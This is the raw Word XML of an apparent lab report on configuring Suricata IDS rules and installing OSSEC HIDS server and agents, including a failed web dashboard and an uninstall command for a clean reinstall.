          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:noProof/>
          <w:color w:val="2D3B45"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="401A8F34" wp14:editId="456042F6">
            <wp:extent cx="5716905" cy="2170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70430"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="031020DA" w14:textId="4BA3FDB2" w:rsidR="002512B5" w:rsidRDefault="002512B5" w:rsidP="00DB007A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6D4879EA" w14:textId="57A06FA9" w:rsidR="00DB007A" w:rsidRDefault="00DB007A" w:rsidP="00DB007A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>To set rules for the WAN IDS for example, we need to go to Services / Suricata / WAN Interface Settings / WAN – Categories. Then we can check all the rules that we want for the interface’s IDS.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40E89CA2" w14:textId="511B0EFF" w:rsidR="00DB007A" w:rsidRDefault="00DB007A" w:rsidP="00DB007A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">We also can set up custom rules in WAN Rules section </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="161B3F21" w14:textId="45B0411A" w:rsidR="00DB007A" w:rsidRPr="00DB007A" w:rsidRDefault="00DB007A" w:rsidP="00DB007A">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="19EE96B4" wp14:editId="2951E44E">
            <wp:extent cx="5716905"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100705"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="665A7898" w14:textId="410BF3C4" w:rsidR="002512B5" w:rsidRDefault="002512B5" w:rsidP="007C322B">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0293703D" w14:textId="6D4572F4" w:rsidR="008420E6" w:rsidRDefault="008420E6" w:rsidP="008420E6">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1C57ED96" w14:textId="7442501B" w:rsidR="008420E6" w:rsidRDefault="008420E6" w:rsidP="008420E6">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2F0819FD" w14:textId="64D9D440" w:rsidR="008420E6" w:rsidRDefault="008420E6" w:rsidP="008420E6">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="13B0972F" w14:textId="77777777" w:rsidR="008420E6" w:rsidRPr="008420E6" w:rsidRDefault="008420E6" w:rsidP="008420E6">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="010F758B" w14:textId="419A38DE" w:rsidR="002512B5" w:rsidRPr="00DB007A" w:rsidRDefault="002512B5" w:rsidP="00DB007A">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="54847882" w14:textId="5986CE21" w:rsidR="00DB007A" w:rsidRDefault="008420E6" w:rsidP="008420E6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Setting up OSSEC:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DEB3DE6" w14:textId="164012AE" w:rsidR="008420E6" w:rsidRDefault="008420E6" w:rsidP="008420E6">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="33195D5A" w14:textId="6F1F0BC0" w:rsidR="008420E6" w:rsidRDefault="008420E6" w:rsidP="008420E6">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1512BE96" w14:textId="64D2017E" w:rsidR="008420E6" w:rsidRPr="008420E6" w:rsidRDefault="008420E6" w:rsidP="008420E6">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2D9663F1" wp14:editId="67B6A482">
            <wp:extent cx="5732780" cy="275907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59075"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="12135825" w14:textId="0B292BE8" w:rsidR="008420E6" w:rsidRDefault="008420E6" w:rsidP="008420E6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="45861A0E" w14:textId="487055E2" w:rsidR="008420E6" w:rsidRDefault="008420E6" w:rsidP="008420E6">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">First, I git cloned the latest version of OSSEC from </w:t>
      </w:r>
      <w:hyperlink r:id="rId18" w:history="1">
        <w:r w:rsidRPr="00222DFA">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>https://github.com/ossec/ossec-hids</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="189BA36F" w14:textId="739D7D98" w:rsidR="008420E6" w:rsidRDefault="008420E6" w:rsidP="008420E6">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Then, I unzip the file then I executed the file named install.sh using </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BE81F09" w14:textId="4A8A0C8F" w:rsidR="008420E6" w:rsidRDefault="008420E6" w:rsidP="008420E6">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>The picture above shows that I am installing the server version because that is my server interface.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ADC8905" w14:textId="2C488294" w:rsidR="008420E6" w:rsidRDefault="008420E6" w:rsidP="008420E6">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">This server will need agents. Therefore, I will redo the same steps on my Ubuntu interface. However, when installing, I should install the agent version of </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ossec</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5452769B" w14:textId="1BE0CA66" w:rsidR="008420E6" w:rsidRDefault="008420E6" w:rsidP="008420E6">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6B1DA8D6" wp14:editId="17AB2616">
            <wp:extent cx="5732780" cy="348297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p>
    <w:p w14:paraId="409EC701" w14:textId="07A96F0F" w:rsidR="008420E6" w:rsidRDefault="008420E6" w:rsidP="008420E6">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Now that I have set up OSSEC on server and agent. I could monitor all the requests that </w:t>
      </w:r>
      <w:r w:rsidR="00187809">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">any agent sends. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A16475A" w14:textId="00B76983" w:rsidR="00772DFA" w:rsidRDefault="00772DFA" w:rsidP="008420E6">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">After setting up server OSSEC in the server, and agent OSSEC in Ubuntu. We need to link the agent to the server. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D00C8F0" w14:textId="3F6F01C4" w:rsidR="008420E6" w:rsidRDefault="00772DFA" w:rsidP="00772DFA">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>In the server, if we go to /var/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ossec</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>/bin/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>manage_agents</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, we can add an agent. Let us add our Ubuntu client:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11A7EE6E" w14:textId="7272B47F" w:rsidR="00772DFA" w:rsidRDefault="00772DFA" w:rsidP="008420E6">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3583515E" w14:textId="4B881A8A" w:rsidR="00772DFA" w:rsidRDefault="00772DFA" w:rsidP="008420E6">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="05F65BAE" wp14:editId="7507E925">
            <wp:extent cx="5732780" cy="2870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40B43617" w14:textId="324D97DE" w:rsidR="00772DFA" w:rsidRDefault="00772DFA" w:rsidP="008420E6">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">I added the Ubuntu agent and got the key that is unique for it. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65C7EE65" w14:textId="42119539" w:rsidR="00772DFA" w:rsidRDefault="00772DFA" w:rsidP="008420E6">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7E1A580A" w14:textId="3193C28F" w:rsidR="00772DFA" w:rsidRDefault="00772DFA" w:rsidP="00772DFA">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Now let us stop and start OSSEC </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F1170D0" w14:textId="6E46571B" w:rsidR="008420E6" w:rsidRDefault="00772DFA" w:rsidP="008420E6">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0D88774B" wp14:editId="184D7320">
            <wp:extent cx="5725160" cy="302133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399A66C0" w14:textId="781E4561" w:rsidR="008420E6" w:rsidRDefault="00772DFA" w:rsidP="008420E6">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Now we can go to </w:t>
      </w:r>
      <w:hyperlink r:id="rId22" w:history="1">
        <w:r w:rsidRPr="00222DFA">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>http://192.168.10.2/ossec-wui</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> and see the dashboard for OSSEC.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C588A42" w14:textId="3D7E4FAC" w:rsidR="00772DFA" w:rsidRDefault="00772DFA" w:rsidP="008420E6">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">I will do something optional which is </w:t>
      </w:r>
      <w:r w:rsidR="006D7616">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">installing OSSEC in windows. I could add agent like I did for Ubuntu. Then I enter the windows name and </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="006D7616">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="006D7616">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. I should get a key that is unique for windows. Install </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="006D7616">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ossec</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="006D7616">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> and add the server </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="006D7616">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="006D7616">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> and unique key in the interface. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31C34A09" w14:textId="1F7AB6A9" w:rsidR="006D7616" w:rsidRPr="008420E6" w:rsidRDefault="006D7616" w:rsidP="008420E6">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="00F98646" wp14:editId="2EB63778">
            <wp:extent cx="5685155" cy="3156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3156585"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E61BE21" w14:textId="16C7D966" w:rsidR="006D7616" w:rsidRPr="006D7616" w:rsidRDefault="006D7616" w:rsidP="006D7616">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0BEBD6A1" w14:textId="71959748" w:rsidR="006D7616" w:rsidRDefault="006D7616" w:rsidP="008420E6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="12D99939" w14:textId="62ECD27F" w:rsidR="006D7616" w:rsidRPr="006D7616" w:rsidRDefault="006D7616" w:rsidP="006D7616">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="49F191A7" wp14:editId="3592FC7B">
            <wp:extent cx="5725160" cy="2647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34E42BB1" w14:textId="306CFF71" w:rsidR="006D7616" w:rsidRDefault="006D7616" w:rsidP="008420E6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6090593B" w14:textId="1CBC1BB4" w:rsidR="006D7616" w:rsidRDefault="006D7616" w:rsidP="008420E6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="777F981C" w14:textId="74FB7490" w:rsidR="006D7616" w:rsidRDefault="006D7616" w:rsidP="008420E6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6DB3A508" w14:textId="1FCF1354" w:rsidR="006D7616" w:rsidRDefault="006D7616" w:rsidP="008420E6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="662534E3" w14:textId="3C6ACB39" w:rsidR="006D7616" w:rsidRDefault="006D7616" w:rsidP="008420E6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="68030C9E" w14:textId="5807EB1B" w:rsidR="006D7616" w:rsidRDefault="006D7616" w:rsidP="008420E6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="42D33F41" w14:textId="77777777" w:rsidR="006D7616" w:rsidRDefault="006D7616" w:rsidP="008420E6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="62D9F551" w14:textId="1189140D" w:rsidR="008420E6" w:rsidRDefault="008420E6" w:rsidP="006D7616">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="52D2FE47" w14:textId="757A6791" w:rsidR="006D7616" w:rsidRDefault="006D7616" w:rsidP="006D7616">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">The problem that I could not fix is that the OSSEC dashboard is empty. I spent hours trying to fix it and I looked for many websites, but nothing worked. However, I managed to make it work in the terminal only.  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23A07C63" w14:textId="5ED09C42" w:rsidR="006D7616" w:rsidRDefault="006D7616" w:rsidP="006D7616">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="040775F5" w14:textId="2D44F3A6" w:rsidR="006D7616" w:rsidRDefault="006D7616" w:rsidP="006D7616">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4943F142" w14:textId="155C9B41" w:rsidR="006D7616" w:rsidRPr="006D7616" w:rsidRDefault="006D7616" w:rsidP="006D7616">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7F3CC6AD" wp14:editId="2E51DB73">
            <wp:extent cx="5725160" cy="3546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362CEF83" w14:textId="74ED328D" w:rsidR="006D7616" w:rsidRDefault="006D7616" w:rsidP="008420E6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4AB953BE" w14:textId="5339680D" w:rsidR="006D7616" w:rsidRDefault="003464A1" w:rsidP="003464A1">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">This is the link that I followed for the first time: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C59AEC9" w14:textId="47E13746" w:rsidR="003464A1" w:rsidRDefault="00000000" w:rsidP="003464A1">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId26" w:history="1">
        <w:r w:rsidR="003464A1" w:rsidRPr="002354C9">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>https://kifarunix.com/install-ossec-hids-agent-on-ubuntu-20-04/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="2915E54A" w14:textId="480A1AAE" w:rsidR="003464A1" w:rsidRDefault="003464A1" w:rsidP="003464A1">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="46AE5409" w14:textId="739083EC" w:rsidR="003464A1" w:rsidRDefault="003464A1" w:rsidP="003464A1">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>I will format both, the server and Ubuntu and I will do the whole thing again with some changes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EECE587" w14:textId="7F1E20EE" w:rsidR="003464A1" w:rsidRDefault="003464A1" w:rsidP="003464A1">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">First, I used this command to remove everything related to </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ossec</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> from both machines:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="492D9962" w14:textId="41CC16EE" w:rsidR="003464A1" w:rsidRDefault="003464A1" w:rsidP="003464A1">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
        </w:rPr>
        <w:t>/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bin/</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control stop &amp;&amp; rm -rf /var/</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xml:space="preserve"> &amp;&amp; rm /etc/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
        </w:rPr>
        <w:t>init.d</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
        </w:rPr>
        <w:t>/*</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
        </w:rPr>
        <w:t>ossec</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
